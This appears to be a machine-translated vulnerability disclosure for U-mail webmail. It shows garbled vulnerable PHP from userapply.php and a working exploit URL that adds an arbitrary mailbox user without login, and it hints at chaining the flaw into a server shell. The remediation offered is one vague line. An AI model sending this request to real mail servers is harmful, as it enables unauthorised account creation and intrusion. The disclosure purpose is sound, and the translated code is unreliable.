U-mail arbitrary user adding Vulnerability (No Logon required)

U-mail arbitrary user adding Vulnerability (No Logon required)

 

This vulnerability allows you to add an email user immediately. You can use it with other unknown 0-day emails to get the getshell

As long as you log on to the email server, it is very harmful .. You know .. Can cause the server to be intruded...



In userapply. php

// Omitting code
 

If ($ Password = "")

{$ Password = "11111";} if ($ nickname = "") {$ nickname = "{$ Mailbox}" ;}$ insert = "insert into userlist (Mailbox, fullName, MailDir, Password, AllowAccess, AllowChangeViaEmail, KeepForwardedMail, ApplyQuotas, EnableMultiPop, MaxDiskSpace, MaxNetFileSpace, DomainID) values ('". $ Mailbox. "',' {$ nickname} ',' {$ MailDir} ',' {$ Password} ', '1', '1', '1', '1 ', '1', '{$ MaxDiskSpace}', '{$ MaxNetFileSpace}', '{$ DomainID}') "; // vulnerability point $ r Esadd = @ mysql_query ($ insert); $ token = md5 (uniqid (rand (); $ email = $ Mailbox. "@". $ domainname; $ full = $ Mailbox; $ reg_time = date ("Y-m-d H: I: s"); $ reg_ip = getenv ("REMOTE_ADDR "); $ log = "insert into admlog (usr_code, username, domainname, action, acttime, Actmailbox, Actdomainname, actarm) values ('00', 'applyuser ','". $ domainname. "', 'add',' {$ reg_time} ',' {$ Mailbox} ',' {$ domainname} ', 'user')"; if ($ Mailbox! = "")..... // Omitting code

If the execadd variable exists and is executed without any judgment, an insert statement is executed directly when the variable does not exist. As a result, any user can be added.

After constructing the following link, we can add a user with the username test1234 and password fuck123456.





Access this link

Http: // 192.168.56.128/webmail/userapply. php? Execadd = 1 & DomainID = 1 & setuppath= 8888888 & Mailbox = test1234 & Password = fuck123456 & DomainID = 1
 

 

 

Http://192.168.56.128/webmail/userapply.php?execadd=1&DomainID=1&setuppath=8888888&Mailbox=test1234&Password=fuck123456&DomainID=1
 

 

Solution:

Enhanced Filtering